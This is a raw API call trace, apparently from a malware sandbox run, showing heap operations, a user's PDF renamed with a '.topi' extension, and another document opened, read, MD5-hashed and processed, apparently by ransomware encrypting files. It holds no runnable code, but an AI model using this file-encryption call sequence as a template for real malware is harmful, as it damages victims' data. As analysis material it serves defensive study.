[0096.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0096.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4c40 [0096.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4c28 [0096.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0096.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c40 | out: hHeap=0x680000) returned 1 [0096.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c28 | out: hHeap=0x680000) returned 1 [0096.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.981] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0096.981] GetCurrentThreadId () returned 0x8c4 [0096.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.981] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8cd0 [0096.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0096.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.982] GetCurrentThreadId () returned 0x8c4 [0096.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0096.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.982] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.982] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c28 [0096.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c40 [0096.983] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.983] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c10 [0096.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0096.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4c58 [0096.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a30 [0096.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0096.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c28 | out: hHeap=0x680000) returned 1 [0096.984] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c28 [0096.984] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0096.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0096.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c28 | out: hHeap=0x680000) returned 1 [0096.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.985] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0096.985] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.986] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.986] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\edkvuK3CEFna.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\edkvuk3cefna.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\edkvuK3CEFna.pdf.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\edkvuk3cefna.pdf.topi")) returned 1 [0096.988] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\GvT VcF9B.pps") returned=".pps" [0096.988] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\GvT VcF9B.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\gvt vcf9b.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.988] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=94418) returned 1 [0096.989] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.992] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x170ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.992] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.993] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.994] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0096.995] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.995] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.995] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.995] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.995] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.995] GetLastError () returned 0x0 [0096.996] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.996] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0096.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.996] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.996] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.996] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.996] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.996] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x170d0) returned 0x9a06a00 [0096.997] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.997] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03008 [0096.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bf8 [0096.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03050 [0096.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c10 [0096.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c40 [0096.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c58 [0096.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.997] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.997] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0096.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c40 | out: hHeap=0x680000) returned 1 [0096.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c58 | out: hHeap=0x680000) returned 1 [0096.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0096.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4c58 [0096.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4c40 [0096.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0096.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c58 | out: hHeap=0x680000) returned 1 [0096.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c40 | out: hHeap=0x680000) returned 1 [0096.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0096.999] GetCurrentThreadId () returned 0x8c4 [0096.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0096.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f8d60 [0096.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0096.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.000] GetCurrentThreadId () returned 0x8c4 [0097.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c40 [0097.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c58 [0097.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c28 [0097.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4c70 [0097.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49d0 [0097.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c40 | out: hHeap=0x680000) returned 1 [0097.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c40 [0097.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.003] 